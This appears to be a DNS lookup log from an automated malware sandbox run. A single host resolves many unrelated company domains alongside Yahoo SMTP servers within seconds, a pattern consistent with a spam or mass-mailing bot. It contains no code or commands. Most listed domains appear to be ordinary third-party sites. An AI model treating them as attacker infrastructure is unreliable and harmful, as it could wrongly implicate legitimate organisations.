                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.257616043 CEST8.8.8.8192.168.2.30x67e5No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.288686037 CEST8.8.8.8192.168.2.30x2f08No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.288686037 CEST8.8.8.8192.168.2.30x2f08No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.299649954 CEST8.8.8.8192.168.2.30xa718No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.302000999 CEST8.8.8.8192.168.2.30xb5b1No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.302000999 CEST8.8.8.8192.168.2.30xb5b1No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.331784964 CEST8.8.8.8192.168.2.30xcb00Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.333126068 CEST8.8.8.8192.168.2.30xa4bfName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.336412907 CEST8.8.8.8192.168.2.30x2320Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.339874983 CEST8.8.8.8192.168.2.30xa2ddNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.345609903 CEST8.8.8.8192.168.2.30xe756No error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.345642090 CEST8.8.8.8192.168.2.30x120cNo error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.345642090 CEST8.8.8.8192.168.2.30x120cNo error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.367772102 CEST8.8.8.8192.168.2.30x4f13Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.415016890 CEST8.8.8.8192.168.2.30x323dName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.415276051 CEST8.8.8.8192.168.2.30xa790No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.415276051 CEST8.8.8.8192.168.2.30xa790No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.427088976 CEST8.8.8.8192.168.2.30xa612Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.436887980 CEST8.8.8.8192.168.2.30x34b9No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.436887980 CEST8.8.8.8192.168.2.30x34b9No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.453069925 CEST8.8.8.8192.168.2.30x232eName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.455501080 CEST8.8.8.8192.168.2.30xb12fNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.455501080 CEST8.8.8.8192.168.2.30xb12fNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.484667063 CEST8.8.8.8192.168.2.30xcfaNo error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.493232012 CEST8.8.8.8192.168.2.30x17b4Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.517263889 CEST8.8.8.8192.168.2.30xb43eNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.558542967 CEST8.8.8.8192.168.2.30x50edNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.640041113 CEST8.8.8.8192.168.2.30xdab5No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.640041113 CEST8.8.8.8192.168.2.30xdab5No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.668345928 CEST8.8.8.8192.168.2.30x55abNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.714468956 CEST8.8.8.8192.168.2.30xff12No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.749294043 CEST8.8.8.8192.168.2.30xc33bNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.749294043 CEST8.8.8.8192.168.2.30xc33bNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.775227070 CEST8.8.8.8192.168.2.30x9e16No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.775227070 CEST8.8.8.8192.168.2.30x9e16No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.793790102 CEST8.8.8.8192.168.2.30xe7f8No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.793790102 CEST8.8.8.8192.168.2.30xe7f8No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.805541992 CEST8.8.8.8192.168.2.30xf244No error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.805541992 CEST8.8.8.8192.168.2.30xf244No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.805541992 CEST8.8.8.8192.168.2.30xf244No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.805541992 CEST8.8.8.8192.168.2.30xf244No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.913350105 CEST8.8.8.8192.168.2.30xb658No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.921859980 CEST8.8.8.8192.168.2.30x837fNo error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.921859980 CEST8.8.8.8192.168.2.30x837fNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.921859980 CEST8.8.8.8192.168.2.30x837fNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.921859980 CEST8.8.8.8192.168.2.30x837fNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.976301908 CEST8.8.8.8192.168.2.30xacddNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.976301908 CEST8.8.8.8192.168.2.30xacddNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.976301908 CEST8.8.8.8192.168.2.30xacddNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.976301908 CEST8.8.8.8192.168.2.30xacddNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.984487057 CEST8.8.8.8192.168.2.30x1961No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.057605982 CEST8.8.8.8192.168.2.30x9b50No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.058348894 CEST8.8.8.8192.168.2.30xd85aNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.058348894 CEST8.8.8.8192.168.2.30xd85aNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.077841997 CEST8.8.8.8192.168.2.30x963eNo error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.084932089 CEST8.8.8.8192.168.2.30x9a78No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.131580114 CEST8.8.8.8192.168.2.30xc904No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.131580114 CEST8.8.8.8192.168.2.30xc904No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.236829996 CEST8.8.8.8192.168.2.30xa2f8Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.257741928 CEST8.8.8.8192.168.2.30x7b9cNo error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.269639015 CEST8.8.8.8192.168.2.30x145dNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.307684898 CEST8.8.8.8192.168.2.30xc365No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.472134113 CEST8.8.8.8192.168.2.30xed1bNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.494949102 CEST8.8.8.8192.168.2.30x4b69No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.591051102 CEST8.8.8.8192.168.2.30xe599No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.603657961 CEST8.8.8.8192.168.2.30xab47No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.685647964 CEST8.8.8.8192.168.2.30x6bc7No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.685647964 CEST8.8.8.8192.168.2.30x6bc7No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.695660114 CEST8.8.8.8192.168.2.30x901aNo error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.833518028 CEST8.8.8.8192.168.2.30x8225No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.928621054 CEST8.8.8.8192.168.2.30xe9b6No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.994237900 CEST8.8.8.8192.168.2.30xd67cNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.029392958 CEST8.8.8.8192.168.2.30xef56Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.047871113 CEST8.8.8.8192.168.2.30x9708No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.047871113 CEST8.8.8.8192.168.2.30x9708No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.047871113 CEST8.8.8.8192.168.2.30x9708No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.053880930 CEST8.8.8.8192.168.2.30xbf5dNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.053880930 CEST8.8.8.8192.168.2.30xbf5dNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.053880930 CEST8.8.8.8192.168.2.30xbf5dNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.062211990 CEST8.8.8.8192.168.2.30xc60aNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.088788986 CEST8.8.8.8192.168.2.30xdaf0No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.193646908 CEST8.8.8.8192.168.2.30x9bfaName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.207741022 CEST8.8.8.8192.168.2.30x6088No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.263227940 CEST8.8.8.8192.168.2.30xcec8No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.263227940 CEST8.8.8.8192.168.2.30xcec8No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.295294046 CEST8.8.8.8192.168.2.30x322bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.305201054 CEST8.8.8.8192.168.2.30x13a2No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.452431917 CEST8.8.8.8192.168.2.30xc330No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.467613935 CEST8.8.8.8192.168.2.30xa07bNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.551104069 CEST8.8.8.8192.168.2.30xc5adNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.551104069 CEST8.8.8.8192.168.2.30xc5adNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.628964901 CEST8.8.8.8192.168.2.30x8628No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.726082087 CEST8.8.8.8192.168.2.30x2fedServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.827846050 CEST8.8.8.8192.168.2.30x7d51No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.827846050 CEST8.8.8.8192.168.2.30x7d51No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.827846050 CEST8.8.8.8192.168.2.30x7d51No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.827846050 CEST8.8.8.8192.168.2.30x7d51No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.827846050 CEST8.8.8.8192.168.2.30x7d51No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.853399038 CEST8.8.8.8192.168.2.30x7c9dNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.892709017 CEST8.8.8.8192.168.2.30xeda6No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.977077961 CEST8.8.8.8192.168.2.30xc4a2No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.036134005 CEST8.8.8.8192.168.2.30x3e4dNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.036134005 CEST8.8.8.8192.168.2.30x3e4dNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.049588919 CEST8.8.8.8192.168.2.30xef56Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.310985088 CEST8.8.8.8192.168.2.30x322bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.398874044 CEST8.8.8.8192.168.2.30x55a9No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.398874044 CEST8.8.8.8192.168.2.30x55a9No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.435125113 CEST8.8.8.8192.168.2.30x6ff1No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.774452925 CEST8.8.8.8192.168.2.30x86b3No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.815855026 CEST8.8.8.8192.168.2.30xa984No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.815855026 CEST8.8.8.8192.168.2.30xa984No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.993848085 CEST8.8.8.8192.168.2.30x8296No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.993848085 CEST8.8.8.8192.168.2.30x8296No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.321827888 CEST8.8.8.8192.168.2.30x322bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.334068060 CEST8.8.8.8192.168.2.30xff14No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.341666937 CEST8.8.8.8192.168.2.30x58dNo error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.341666937 CEST8.8.8.8192.168.2.30x58dNo error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.476802111 CEST8.8.8.8192.168.2.30x45faNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.480832100 CEST8.8.8.8192.168.2.30x55fNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.480832100 CEST8.8.8.8192.168.2.30x55fNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.485929012 CEST8.8.8.8192.168.2.30x9ce2No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.572550058 CEST8.8.8.8192.168.2.30xe902No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.710594893 CEST8.8.8.8192.168.2.30xe814No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.710594893 CEST8.8.8.8192.168.2.30xe814No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.734947920 CEST8.8.8.8192.168.2.30xe8f3No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.734947920 CEST8.8.8.8192.168.2.30xe8f3No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.825248957 CEST8.8.8.8192.168.2.30xd2e6Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.966142893 CEST8.8.8.8192.168.2.30x666dNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.966142893 CEST8.8.8.8192.168.2.30x666dNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:56.768507957 CEST8.8.8.8192.168.2.30x8301No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.858622074 CEST8.8.8.8192.168.2.30xa1caNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.867777109 CEST8.8.8.8192.168.2.30x4560No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.998970985 CEST8.8.8.8192.168.2.30xda37No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.005721092 CEST8.8.8.8192.168.2.30xc9bdNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.067287922 CEST8.8.8.8192.168.2.30x39d3No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.070194960 CEST8.8.8.8192.168.2.30xa74cNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.073441029 CEST8.8.8.8192.168.2.30x3521No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.074882030 CEST8.8.8.8192.168.2.30x2f8bNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.074937105 CEST8.8.8.8192.168.2.30xd238No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.074937105 CEST8.8.8.8192.168.2.30xd238No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.075386047 CEST8.8.8.8192.168.2.30x3e6dNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.075946093 CEST8.8.8.8192.168.2.30xbbf8No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.075946093 CEST8.8.8.8192.168.2.30xbbf8No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.078536987 CEST8.8.8.8192.168.2.30xffebName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.080220938 CEST8.8.8.8192.168.2.30x4036No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.081687927 CEST8.8.8.8192.168.2.30xd1b1No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.081687927 CEST8.8.8.8192.168.2.30xd1b1No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.081687927 CEST8.8.8.8192.168.2.30xd1b1No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.103749990 CEST8.8.8.8192.168.2.30x17e5No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.103749990 CEST8.8.8.8192.168.2.30x17e5No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.114856005 CEST8.8.8.8192.168.2.30xd70eNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.145838976 CEST8.8.8.8192.168.2.30xb051No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
